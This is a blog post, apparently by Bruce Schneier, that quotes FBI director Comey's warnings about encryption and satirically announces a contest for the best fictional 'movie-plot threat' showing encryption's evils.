    “We’re drifting toward a place where a whole lot of people are going to be looking at us with tears in their eyes,” Comey argued, “and say ‘What do you mean you can’t? My daughter is missing. You have her phone. What do you mean you can’t tell me who she was texting with before she disappeared?”

    […]

    “I’ve heard tech executives say privacy should be the paramount virtue,” Comey said. “When I hear that, I close my eyes and say, ‘Try to imagine what that world looks like where pedophiles can’t be seen, kidnappers can’t be seen, drug dealers can’t be seen.'”

    (More Comey here.)

    Come on, Comey. You might be able to scare noobs like Rep. John Carter with that talk, but you’re going to have to do better if you want to win this contest. We heard this same sort of stuff out of then-FBI director Louis Freeh in 1996 and 1997.

    This is the contest: I want a movie-plot threat that shows the evils of encryption. (For those who don’t know, a movie-plot threat is a scary-threat story that would make a great movie, but is much too specific to build security policies around. Contest history here.) We’ve long heard about the evils of the Four Horsemen of the Internet Apocalypse—terrorists, drug dealers, kidnappers, and child pornographers. (Or maybe they’re terrorists, pedophiles, drug dealers, and money launderers; I can never remember.) Try to be more original than that. And nothing too science fictional; today’s technology or presumed technology only.

    Entries are limited to 500 words—I check—and should be posted in the comments. At the end of the month, I’ll choose five or so semifinalists, and we can all vote and pick the winner.

    The prize will be signed copies of the 20th Anniversary Edition of the 2nd Edition of Applied Cryptography, and the 15th Anniversary Edition of Secrets and Lies, both being published by Wiley this year in an attempt to ride the Data and Goliath bandwagon.

    Good luck.

    Posted on April 1, 2015 at 6:33 AM126 Comments

    Sidebar photo of Bruce Schneier by Joe MacInnis.